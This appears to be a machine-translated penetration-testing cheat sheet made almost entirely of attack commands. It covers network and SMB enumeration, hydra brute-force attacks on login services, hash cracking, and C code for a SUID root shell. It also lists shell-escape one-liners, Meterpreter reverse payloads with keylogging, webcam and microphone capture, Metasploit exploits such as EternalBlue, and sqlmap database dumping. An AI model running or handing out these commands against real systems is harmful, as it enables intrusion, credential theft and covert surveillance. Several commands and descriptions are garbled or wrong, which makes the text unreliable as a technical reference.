Share with heart, just to give you the best learning tutorial If you think the article is good, welcome to continue learning This memo will help you gain a comprehensive understanding of penetration testing and is your first choice for quickly learning, referencing, and becoming familiar with commands and techniques in the field of penetration testing. Whether you're a newbie or an experienced penetration tester, this cheat sheet has everything you need to navigate the world of security assessments. Explore tools, methods, and insights for effective reconnaissance, enumeration, privilege escalation, password cracking, exploit research, and more. Improve your penetration testing skills with this valuable resource!
Order describe nmap -v -sS -A -T4 target Nmap detailed scans, running synchronized stealth, T4 timings, OS and service version information, traceroute and service-specific scripts. ping sweep sudo nmap -pn target Perform a ping scan of the target network to view all available IPs. nmap -v -sS -p–A -T4 target As above, but scans all TCP ports (takes longer). nmap -v -sU -sS -p- -A -T4 target As above, but scans all TCP ports and UDP scans (takes longer). nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X Nmap script for scanning vulnerable SMB servers. nmap localhost Displays all ports currently in use. ls /usr/share/nmap/scripts/* | grep ftp Search for keywords in nmap script.
In computer networks, Server Message Block (SMB) operates as an application layer network protocol and is primarily used to provide shared access to files, printers, and serial ports.
Order describe nbtscan 192.168.1.0/24 Discover Windows/Samba servers on a subnet, find Windows MAC addresses, netbios names and discover client workgroups/domains. enum4linux -a target-ip Do everything, run all options except dictionary-based share name guessing (find Windows client domains/workgroups). smbclient -L target-ip Lists all SMB shares available on the target computer. smbget -R smb://target-ip/share Recursively download files from an SMB share. rpcclient -U "" target-ip Use an empty username to connect to the SMB server and list the available commands. showmount -e target-ip Displays the available shares on the target computer, useful for NFS. smbmap -H target-ip Displays the target's sharing permissions. smbstatus Lists current Samba connections. Useful when running on the target machine.
Alternative host discovery methods that do not use Nmap.
Order describe netdiscover -r 192.168.1.0/24 Discover IPs, MAC addresses, and MAC providers on the subnet from ARP. arp-scan --interface=eth0 192.168.1.0/24 ARP scan to discover hosts on the local network. fping -g 192.168.1.0/24 Send ICMP echo requests to multiple hosts to check if they are active. masscan -p1-65535,U:1-65535 192.168.1.0/24 --rate=1000 Scans all ports at a high rate, useful for initial discovery.
Python local web server commands to facilitate shell and vulnerability exploitation on attack machines.
Order describe python -m SimpleHTTPServer 80 Runs a basic HTTP server, perfect for providing a shell etc. python3 -m http.server 80 Use Python 3 to run a basic HTTP server. python -m SimpleHTTPServer 80 --bind 192.168.1.2 Bind the server to a specific IP address.
How to mount NFS/CIFS, Windows and Linux file shares.
Order describe mount 192.168.1.1:/vol/share /mnt/nfs Mount the NFS share to. /mnt/nfs mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs Install Windows CIFS/SMB shares on Linux. /mnt/cifs net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no Mount a Windows share on Windows from the command line. apt-get install smb4k -y Install smb4k on Kali, a useful Linux GUI for browsing SMB shares. smbclient -L //192.168.1.X -U username Lists SMB shares available on Windows computers.
Device fingerprinting or machine fingerprinting or browser fingerprinting is information collected about a remote computing device for identification purposes.
Order describe nc -v 192.168.1.1 25 Basic version control/fingerprinting via displayed banner. telnet 192.168.1.1 25 Another approach to basic version control/fingerprinting. curl -I 192.168.1.1 Gets the HTTP headers used to fingerprint the web server. nmap -O 192.168.1.1 Use Nmap to perform operating system detection. whatweb 192.168.1.1 Determine the web technologies used on the target.
SNMP enumeration is the process of enumerating user accounts on a target system using SNMP.
Order describe snmpcheck -t 192.168.1.X -c public SNMP enumeration snmpwalk -c public -v1 192.168.1.X 1 SNMP enumeration snmpenum -t 192.168.1.X SNMP enumeration onesixtyone -c names -i hosts SNMP enumeration snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.X Bulk SNMP enumeration
Order describe nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer dig axfr blah.com@ _ Linux DNS zone transfer host -l blah.com _ Another Linux DNS zone transfer method
DNSRecon provides the ability to perform various DNS enumeration tasks.
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Order describe nikto -h 192.168.1.1 Perform a nikto scan on the target dirbuster Configuring via GUI, CLI input doesn't work most of the time gobuster dir -u 192.168.1.1-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Directory brute force and saboteurs wpscan --url 192.168.1.1 WordPress Vulnerability Scanner joomscan -u 192.168.1.1 Jomla Vulnerability Scanner uniscan -u 192.168.1.1-qweds Uniscan automated vulnerability scanner curl -I 192.168.1.1 Using curl to get HTTP headers nmap -p80 --script http-enum 192.168.1.1 Nmap script for HTTP enumeration whatweb 192.168.1.1 Identify the technologies used on the website wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 192.168.1.1/FUZZ Fuzzing HTTP with wfuzz
Order describe tcpdump tcp port 80 -w output.pcap -i eth0 Capture packets on port 80 'tcpdump -i eth0 'port 443 and (tcp-syn tcp-ack)! =0'' wireshark -k -i <interface> Open Wireshark on a specific interface tshark -i eth0 -f "tcp port 80" Use tshark to capture packets on port 80
Order describe python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX Enumerate users from SMB ridenum.py 192.168.XXX.XXX500 50000 dict.txt RID period SMB/enumerate users from SMB enum4linux -U 192.168.XXX.XXX Enumerate SMB usernames using enum4linux
Order describe 'snmpwalk public -v1 192.168.X.XXX1 Grepp77.1.2.25 python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX Enumerate users from SNMP nmap -sT -p 161 192.168.X.XXX/254-oG snmp_results.txt Search for SNMP servers with nmap, grepable output
Order describe /usr/share/wordlists Kali word list wget 1000000.txt Download the hot word list from GitHub
Order describe hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXftp -V Hydra FTP Brute Force
Order describe hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXpop3 -V Hydra POP3 Brute Force
Order describe hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXXsmtp -V Hydra SMTP Brute Force
Order describe hydra -l root -P /usr/share/wordlistsnmap.lst 192.168.X.XXXssh Hydra SSH Brute Force
Used to limit concurrent connections, for example:-t-t 15
Order describe john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt JTR forces the use of word lists for decryption cracking john –format=descrypt hash –show JTR forced decryption brute force cracking
Order describe hashcat -m 0 -a 0 hash.txt wordlist.txt Hashcat MD5 Crack hashcat -m 1000 -a 0 hash.txt wordlist.txt Hashcat NTLM Crack
Order describe 'Search window 2003 grep -i local' site: exploit-db.comexploit kernel <= 3 Google search for kernel vulnerabilities grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* Searching for Windows 7 vulnerabilities in Metasploit modules msfconsole -q -x "search name:windows type:exploit" Search Metasploit for Windows exploits
head File operating system process.h, string.h, winbase.h, windows.h, winsock2.h window arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h Linux directory
Order describe gcc -o exploit exploit.c Basic GCC compilation gcc -Wall -Wextra exploit.c -o exploit Compile with all warnings and extras
Order describe gcc -m32 exploit.c -o exploit Cross-compiling 64-bit binaries on 32-bit Linux
Order describe i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile Windows .exe on Linux x86_64-w64-mingw32-gcc exploit.c -o exploit.exe Compile 64-bit Windows .exe on Linux
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }
int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }
Order describe gcc -o suid suid.c Compile SUID shell gcc -m32 -o suid suid.c Compiling a 32-bit SUID shell
python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
Generate ruby TTY shell
ruby -e 'exec "/bin/sh"'
Generate Lure TTY Shell
lua -e 'os.execute("/bin/sh")'
Generate TTY shell from Vi
:!bash
Generate TTY shell from NMAP
!sh
Generate TTY shell from awk
awk 'BEGIN {system("/bin/sh")}'
Generate TTY shell from Sokat
socat file:tty,raw,echo=0 tcp-listen:4444
Windows reverse meter payload
set payload windows/meterpreter/reverse_tcp
Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp set ViewOnly false
Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcp
Android reverse meter payload
set payload android/meterpreter/reverse_tcp
Order describe upload file c:\\windows Upload file to window target download c:\\windows\\repair\\sam /tmp Download file from windows target execute -fc:\\windows\temp\exploit.exe Run the .exe on the target execute -f cmd -c Create new channel using cmd shell PS Show process shell Get the shell on the target getsystem Try elevating privileges on the target hashdump Dump hash on target portfwd add -l 3389 -p 3389 -r target Create a port forwarded to the target computer portfwd delete –l 3389 –p 3389 –r target Remove port forwarding screenshot Capture a screenshot of the target computer keyscan_start Start keylogger keyscan_dump Dump collected keystrokes webcam_snap Take a webcam snapshot record_mic Recording microphone enum_chrome Enumerate Chrome browser data
Order describe use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 remote exploit use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit use exploit/windows/smb/ms09_050_smb2_negotiate_func_index MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Attack use exploit/windows/smb/ms17_010_eternalblue MS17_010 Eternal Blue SMB remote window kernel pool is damaged
Order describe use exploit/windows/local/bypassuac Bypass UAC + set target + architecture on Windows 7, x86/64 use exploit/windows/local/ms10_015_kitrap0d MS10_015 Kitrap0d local privilege escalation
Order describe use auxiliary/scanner/http/dir_scanner Metasploit HTTP Directory Scanner use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS Vulnerability Scanner use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner use auxiliary/scanner/mysql/mysql_version Metasploit MySQL Version Scanner use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module
Order describe use exploit/multi/script/web_delivery Metasploit Power Shell Payload Delivery Module post/windows/manage/powershell/exec_powershell Upload and run Powershell scripts through sessions use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload
Order describe run post/windows/gather/win_privs Metasploit displays the current user's permissions use post/windows/gather/credentials/gpp Metasploit scrapes GPP saved passwords load mimikatz -> wdigest Metasploit load Mimikatz run post/windows/gather/local_admin_search_enum Identifies other computers to which the provided domain user has administrative access
Operating system TTL size window 128 Linux directory 64 Solaris 255 Cisco/Network 255
Order describe enable Enter enable mode conf t Abbreviation, configuration terminal (config)# interface fa0/0 Configure Fast Ethernet 0/0 (config-if)#ip addr 0.0.0.0 255.255.255.255 Add IP to fa0/0 (config-if)# line vty 0 4 Configure vty lines (config-line)# login Cisco sets remote login password (config-line)# password YOUR-PASSWORD Set remote login password # show running-config Displays the running configuration loaded in memory # show startup-config Show startup configuration # show version Show Cisco IOS version # show session Show open sessions #showipinterface show network interface # show interface e0 Show detailed interface information #showiproute show route # show access-lists Show access list # dir file systems Show available files # dir all-filesystems File information # dir /all Show deleted files # terminal length 0 Unlimited terminal output # copy running-config tftp Copy the running configuration to the tftp server # copy running-config startup-config Copy startup configuration to running configuration
Hash length
hash size MD5 16 bytes SHA-1 20 bytes SHA-256 32 bytes SHA-512 64 bytes
Hash example
hash example MD5 hash example 8743b52063cd84097a65d1633f5c74f5 SHA1 hash example B89EAAC7E61417341b710b727768294d0e6a277b SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
Order describe sqlmap -u meh.com–forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3 Automatic sqlmap scanning sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read="/var/www/blah.php" Targeted sqlmap scanning sqlmap -u " meh.com/meh.php? " –dbms=mysql –tech=U –random-agent –dump Scan URLs for federation + error based injection with MySQL backend and use random user agent + database dump sqlmap -o -u " meh.com/form/"-forms SQLMap inspection form for injection sqlmap -o -u " meh/vuln-form" –forms -D database-name -T users –dump SQLMap dump and cracked hash of table user on database name
This article is only for technology sharing and should not be used for illegal purposes. If you are interested in the software or technology in this article, please feel free to communicate.